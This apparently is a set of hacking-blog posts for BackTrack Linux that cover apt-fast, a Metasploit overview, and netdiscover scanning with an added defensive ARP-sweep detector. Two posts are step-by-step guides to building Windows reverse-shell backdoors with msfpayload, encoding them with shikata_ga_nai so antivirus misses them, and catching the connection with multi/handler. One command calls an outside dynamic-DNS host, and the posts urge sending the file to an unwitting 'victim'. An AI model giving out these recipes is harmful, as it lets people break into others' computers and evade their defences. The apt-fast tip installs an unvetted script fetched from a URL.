IDM FOR BACKTRACK

INSTALL IDM IN BACKTRACK



Everyone relies on the famous "apt-get" command to install packages or update their systems. Unfortunately "apt" only uses a single connection, which makes the process quite slow. This is why many Linux users were looking for a Linux alternative to Internet Download Manager (IDM), or trying in vain to run it with Wine.

The solution comes with a wonderful utility, which is in fact a script named "apt-fast". This utility can be considered the Linux IDM version: it opens multiple connections simultaneously and can boost your download speed to the max.

-First you need to download the script (clean) from here: 

http://www.mattparnell.com/linux/apt-fast/apt-fast.sh

-Make the file executable with this command:

root@bt:~# chmod +x apt-fast.sh

-Move it now to the user bin directory:




root@bt:~# mv apt-fast.sh /usr/bin/apt-fast.sh


Now all that is left is to run "apt-fast.sh" instead of "apt-get", for example:

root@bt:~# apt-fast.sh update



root@bt:~# apt-fast.sh install chromium-browser


Introduction to Metasploit

Metasploit - Overview




What is metasploit?

Metasploit, as described by its developers, is: "A collaboration between the open source community and Rapid7, Metasploit software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments, providing true security risk intelligence. Capabilities include smart exploitation, password auditing, web application scanning, and social engineering. Teams can collaborate in Metasploit and present their findings in consolidated reports.

Metasploit editions range from a free edition to professional enterprise editions, all based on the Metasploit Framework, an open source software development kit with the world's largest, public collection of quality-assured exploits." http://www.metasploit.com/about/what-is-it/


There are several Metasploit editions: Metasploit Community, Metasploit Express, Metasploit Pro and the Metasploit Framework. There are also different interfaces for this tool:

- msfconsole, the interactive console;
- msfcli, the command-line interface;
- msfgui, the graphical interface.

(The screenshots of each interface are not reproduced here.)

You should also know that there is no perfect interface for Metasploit; each one has its pros and cons.

Architecture:

(architecture diagram not reproduced here)




Terminology:

1. Exploits: code that takes advantage of a security flaw to let a pentester attack a target.
2. Payloads: the code that runs on the target after a successful exploit; Metasploit can generate them as shellcode or executable files, and you specify what the payload should do.
3. Auxiliaries: integrated supporting modules such as sniffers and keyloggers.
4. Meterpreter: a payload that is injected into a process on the target system and runs there.
5. Encoders: used to modify the original exploit or payload code so that it evades antivirus detection software.


Basic commands:

1. help: displays all the Metasploit console commands.
2. search: use it when you are not sure of the exact name of an exploit. To look for an SMB exploit, for example, type: search smb
3. use: selects a particular exploit.
4. info: shows information about the selected exploit.
5. show options: shows all options of the selected exploit.
6. show payloads / show encoders / show nops: display the payloads, encoders and NOP generators that can be used with the selected exploit.
7. set: sets an option of the selected exploit.

(The screenshots of each command's output are not reproduced here.)


Chennai Hackers Connect  hopes that this article was useful to you.


FUD BACKDOOR WITH MFENCODE

ENCRYPTING PAYLOAD USING MSF-ENCODE

msfpayload windows/shell_reverse_tcp LHOST=firlezza.no-ip.biz LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 5


We have seen how to create a simple backdoor.exe for exploiting Windows machines (see the "Metasploit Backdoor" post). However, that simple backdoor is easily caught by any antivirus program, and you can't rely on a careless victim who is not running one on his machine, because you know that is very rare.
Well, Metasploit has the necessary tools for encoding your backdoor to avoid detection. Let's first see what our chances are of bypassing an antivirus program without encoding:




The scan result (screenshot not reproduced here) shows that we have little chance of successfully exploiting a remote victim.

Let's see what available options does metasploit offer to us:




root@ddr:~# msfencode -h


Let's see what encoders are available:


root@ddr:~# msfencode -l



As you may notice, "shikata_ga_nai" is ranked as the best encoder by "msfencode", so we are going to use it to encode our backdoor.

Let's create our backdoor:

root@ddr:~# msfpayload windows/meterpreter_reverse_tcp LHOST=192.168.1.101 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw -a x86 -b '\x00\x0a\x0d' -x /root/Desktop/pw.exe -o /root/Desktop/pwn.exe



With the above command, we encoded our backdoor 5 times with the "shikata_ga_nai" encoder, told the encoder to avoid the bytes \x00, \x0a and \x0d in its output (-b), used /root/Desktop/pw.exe as the template executable (-x) and wrote the generated exe file to our desktop (-o). Check the result with online virus scanners.


reconnaissance using Netdiscover

Netdiscover scanning




"Netdiscover is an active/passive address reconnaissance tool, mainly developed for those wireless networks without DHCP server, when you are wardriving. It can be also used on hub/switched networks.

Built on top of libnet and libpcap, it can passively detect online hosts, or search for them, by actively sending ARP requests, it can also be used to inspect your network ARP traffic, or find network addresses using auto scan mode, which will scan for common local networks." (source: netdiscover)


The different options of this tool are listed in its help output (screenshot not reproduced here).


In this example, I am going to use "netdiscover" to search for available hosts on my wireless interface:

root@ddr:~# netdiscover -i [interface]



You can give the interface of your choice; if you are connected by cable, for example, your network interface is probably eth0. To see which network interfaces you have, open a terminal and type: ifconfig


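Netdiscover's active mode announces itself on the wire as a burst of ARP requests for consecutive addresses. The following added example (not from this post or from netdiscover) shows how a defender can spot such a sweep in a list of ARP request records; the records are constructed, and the window and threshold values are assumptions rather than published defaults.

```python
"""Spot an active ARP sweep (the traffic an ARP-based scanner such as
netdiscover generates) in a list of ARP 'who-has' requests.

Added example for this post; it is not netdiscover's code. Records would
normally come from a capture; the ones built here are constructed.
"""
from collections import defaultdict

def build_sample():
    """Constructed requests: (seconds, sender_mac, sender_ip, target_ip).

    One host walks the whole 192.168.1.0/24 range within a few seconds, as an
    active ARP scan of the local network does; a second host only ever asks
    for its gateway, which is normal behaviour.
    """
    requests = []
    for last in range(1, 255):
        requests.append((last * 0.02, "aa:bb:cc:00:00:15", "192.168.1.15", f"192.168.1.{last}"))
    for k in range(5):
        requests.append((k * 3.0, "de:ad:be:ef:00:42", "192.168.1.42", "192.168.1.1"))
    return requests

def detect_arp_sweeps(requests, window_seconds=10.0, min_targets=20):
    """Return {sender_mac: peak_distinct_targets} for every sender that asked
    for at least `min_targets` different IPs inside any `window_seconds` span.

    Window and threshold are assumed values; tune them to your network. Only
    active scanning is visible this way: a purely passive listener sends no
    requests and leaves nothing to count.
    """
    per_sender = defaultdict(list)
    for ts, mac, _sender_ip, target_ip in requests:
        per_sender[mac].append((ts, target_ip))

    flagged = {}
    for mac, events in per_sender.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Advance the window start until the span fits in window_seconds.
            while events[end][0] - events[start][0] > window_seconds:
                start += 1
            distinct = len({target for _, target in events[start:end + 1]})
            if distinct >= min_targets:
                flagged[mac] = max(flagged.get(mac, 0), distinct)
    return flagged

if __name__ == "__main__":
    for mac, count in detect_arp_sweeps(build_sample()).items():
        print(f"{mac} asked for {count} distinct hosts: looks like an ARP sweep")
```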


Metasploit Backdoor

Creating simple Metasploit Backdoor



In this scenario, we are going to create a simple backdoor, which is an infected executable file to be run on a Windows system. You need to provide your IP address, which can be obtained with the command "ifconfig", together with the port you want your backdoor to connect to. The usual port for this connection is 443 or 4444, but you can choose any other port.


Issue the following command:


root@ddr:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.15 LPORT=4444 X > /root/Desktop/backdoor.exe



So, as you can see from this example, a backdoor.exe has been created (the screenshot, not reproduced here, shows it in the "Home" folder).
In the above example just change the IP address to yours, and name the file whatever you like; after all, you don't want to tell your victim that this is a backdoor!! :-)

Now, we have finished with the first part, but what is next? 

We simply need a listener which will handle the connection back to our exploit machine.

First of all, we need to open metasploit console:


root@ddr:~# msfconsole


Now we need to use the multi/handler module for the reverse connection:


msf >  use exploit/multi/handler



Now we set up our payload:



msf >  set payload windows/meterpreter/reverse_tcp



Now, we have to set up the lhost & lport:


msf >  set lhost 192.168.1.15

msf >  set lport 4444



The last step is to type "exploit":



msf > exploit




We are ready for exploiting the remote machine. Send the backdoor to a victim and wait for a connection ;-)

